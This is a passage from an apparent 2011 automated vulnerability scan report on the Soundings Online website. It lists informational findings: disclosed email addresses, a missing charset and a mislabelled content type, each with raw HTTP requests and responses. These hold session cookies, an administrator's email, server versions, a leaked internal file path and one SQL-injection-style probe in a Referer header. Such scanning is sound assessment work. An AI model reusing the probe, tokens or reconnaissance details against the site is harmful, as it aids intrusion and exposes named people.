Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.44. http://www.soundingsonline.com/resources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The following email addresses were disclosed in the response:

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.45. http://www.soundingsonline.com/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /s_code.js HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Content-Length: 33956
Content-Type: application/x-javascript
Last-Modified: Fri, 22 Jan 2010 21:42:50 GMT
Accept-Ranges: bytes
ETag: "d4e125d8ab9bca1:2b06"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:23:53 GMT
Connection: close

/***********************************************/
/*
SiteCatalyst code version: H.21.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.25.2010
*/
/***********************************************/

var s_account="desoundings"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/* You may add
...[SNIP]...

7.46. http://www.soundingsonline.com/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The following email addresses were disclosed in the response:

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.47. http://www.soundingsonline.com/subscription-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The following email addresses were disclosed in the response:

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.48. http://www.soundingsonline.com/subscription-services/preview-current-issue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The following email addresses were disclosed in the response:

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.49. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The following email addresses were disclosed in the response:

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

8. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

<br />
<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

<br />
<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 10:54:08 CST 2011.